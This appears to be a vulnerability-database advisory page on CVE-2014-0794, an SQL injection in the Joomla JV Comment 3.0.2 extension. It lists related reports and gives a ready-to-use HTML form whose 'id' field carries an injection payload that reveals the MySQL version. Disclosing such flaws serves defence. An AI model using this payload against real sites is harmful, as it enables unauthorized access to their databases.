Joomla! JV Comment SQL Injection Vulnerabilit
Reporter | Title | Published | Views | Family All 11 |
---|---|---|---|---|
![]() | Joomla JV Comment 3.0.2 SQL Injection | 24 Jan 201400:00 | – | packetstorm |
![]() | CVE-2014-0794 | 26 Jan 201420:55 | – | nvd |
![]() | CVE-2014-0794 | 26 Jan 201420:00 | – | cvelist |
![]() | Joomla! Component JV Comment 3.0.2 - 'id' SQL Injection | 24 Jan 201400:00 | – | exploitdb |
![]() | Sql injection | 26 Jan 201420:55 | – | prion |
![]() | Joomla JV Comment 3.0.2 SQL Injection Vulnerability | 24 Jan 201400:00 | – | zdt |
![]() | SQL Injection in JV Comment Joomla Extension | 2 Jan 201400:00 | – | htbridge |
![]() | SQL Injection in JV Comment Joomla Extension | 3 Feb 201400:00 | – | securityvulns |
![]() | Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 3 Feb 201400:00 | – | securityvulns |
![]() | CVE-2014-0794 | 26 Jan 201420:55 | – | cve |
The following exploitation example displays version of MySQL database:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task" value="comment.like">
<input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo